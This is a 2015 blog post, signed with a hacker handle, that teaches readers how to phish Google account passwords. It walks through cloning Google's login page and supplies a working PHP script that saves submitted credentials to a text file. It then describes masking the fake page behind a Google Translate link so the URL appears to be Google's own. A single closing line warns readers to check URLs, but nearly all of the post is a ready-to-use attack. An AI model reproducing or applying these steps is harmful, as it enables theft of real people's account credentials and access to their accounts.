Tuesday, 19 May 2015

Hack Google Accounts with a Google Translator Exploit




Google is our friend, but it still has its flaws as everything tends to. A little known flaw within the media giant allows phishing to take place on Google accounts that would completely bypass advanced web protection programs in user's browsers—as well as other protections that have been put in place by Google. How would it do this? The domain will read as if it is through Google itself.
 

Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator Exploit


It also plays on human psychology, because the domain appears to be a trusted one that you would visit rather regularly. This kind of phishing allows people to steal credentials in plain-text, and by using this method, said hackers likely do so without anyone realizing.

Requirements

  • A webhosting account
  •  Cpanel access to the webhost

 

Step 1 Create a Gmail Phishing Page

First, we need to make a phishing page to prepare.
  1. Open up a text document using notepad, or your choice in text editors.
  2. Go to the Google login page.
  3. Right-click somewhere on the page, and click View page source.
  4. Copy all of the contents of the source code and paste them into your text document.
  5. Hit ctrl + f, and search for "action=" and change the method to "GET", and the text to the right of "action=" to "log.php".
  6. Click File > Save as and save it with the name "index.php" (make sure to click the drop-down menu to select "all files" if it's not selected already).
  7. Make a new text file, and paste the below as the contents (paste the raw text, not the numbered). This is the file written in PHP that logs the victim's login details.
    <?php
    $handle = fopen("passwords.txt", "a");
    foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?> 
  8. Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.
  9. Log in to your hosting account, and upload both files to the root of your website (not in a folder).
  10. When credentials are logged, they will be in a file called "passwords.txt" in the root of your website. Check the box next to the "passwords.txt" file when you get some logs, and click chmod. Change the file to 466 permissions, so other people can't read the victim's passwords.

Step 2 Manipulating Google

How exactly does the manipulation work behind this? Google Translator. Google translator has a vulnerability that if an attacker creates a fake gmail login page and then translates it with the tool, they would get a perfectly crafted link masked by Google itself. Check out this URL for an example of a phishing page that was created and then masked after using the translation tool.
This fools users into thinking the page is legit. I mean, look at the URL:










Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator Exploit
  1.  Go to Google translate.
  2. Translate your page from a different language into English.
  3. Click the link and test.

See how frighteningly easy it is to manipulate a website even as large as Google? Keep safe by always analyzing that URL.


#!13lackD3M0n

No comments:

Post a Comment